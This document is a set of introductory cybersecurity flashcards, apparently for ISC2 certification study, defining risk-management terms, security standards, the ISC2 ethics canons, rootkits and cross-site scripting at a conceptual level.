Chapter 1: Security Principles Flashcards
Vulnerability
Weakness in an information system, system security procedures, internal controls or implementation that could be exploited by a threat source.
Risk
A measure of the extent to which an entity is threatened by a potential circumstance or event.
Threat
Any circumstance or event with the potential to adversely impact organisational operations (including mission, functions, image or reputation), organisational assets, individuals, other organisations or the nation through an information system via unauthorised access, destruction, disclosure, modification of information and/or denial of service.
Threat Vector
The means by which a threat actor carries out their objectives.
Risk Likelihood
The probability that a risk will occur
Risk Impact
Risk impact is the potential consequence or damage that a problem can cause if it occurs. It can be measured in terms of financial loss, operational disruption, customer dissatisfaction, reputation damage, legal liability, or any other relevant metric.
Risk Identification
Risk identification (RI) is a set of activities that detect, describe and catalog all potential risks to assets and processes that could have negatively impact business outcomes in terms of performance, quality, damage, loss or reputation.
Risk Acceptance
Determining that the potential benefits of a business function outweigh the possible risk impact/likelihood and performing that business function with no other action.
Risk Avoidance
Determining that the impact and/or likelihood of a specific risk is too great to be offset by the potential benefits and not performing a certain business function because of that determination.
Risk Transference
Paying an external party to accept the financial impact of a given risk.
Security Controls
Mitigate the impact or reduce the likelihood of the threat happening
NIST 800-53
The NIST Special Publication 800-53, Security and Privacy Controls for Information Systems and Organisations is a set of recommended security and privacy controls for federal information systems and organisations to help meet the Federal Information Security Management Act (FISMA) requirements.
PCI-DSS
The PCI DSS (Payment Card Industry Data Security Standard) is an information security standard designed to reduce payment card fraud by increasing security controls around cardholder data.
Cost/Benefit Analysis
A cost-benefit analysis is a systematic process that businesses use to analyse which decisions to make and which to forgo.
Risk Appetite
Risk appetite is the level of risk that an organisation is willing to accept while pursuing its objectives, and before any action is determined to be necessary in order to reduce the risk.
ISC2 Code of Ethics Canons
- Protect society, the common good, necessary public trust and confidence and the infrastructure
- Act honorably, honestly, justly, responsibly and legally
- Provide diligent and competent service to principals
- Advance and protect the profession
Risk Tolerance
The level of risk or degree of uncertainty that is acceptable to organisations. The organisation’s or stakeholder’s readiness to bear the remaining risk after risk response in order to achieve its objectives, with the consideration that such tolerance can be influenced by legal or regulatory requirements.
Rootkits
A rootkit is software used by cybercriminals to gain control over a target computer or network. Rootkits can sometimes appear as a single piece of software but are often made up of a collection of tools that allow hackers administrator-level control over the target device.
A rootkit tries to maintain root-level access while concealing malicious activity. It typically creates a backdoor and attempts to remain undetected by anti-malware software. A rootkit is active while the system is running.
Cross-Site Scripting
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.
Risk Management
Cybersecurity risk management is an ongoing process of identifying, analysing, evaluating, and addressing your organisation’s cybersecurity threats. Cybersecurity risk management isn’t simply the job of the security team; everyone in the organisation has a role to play.
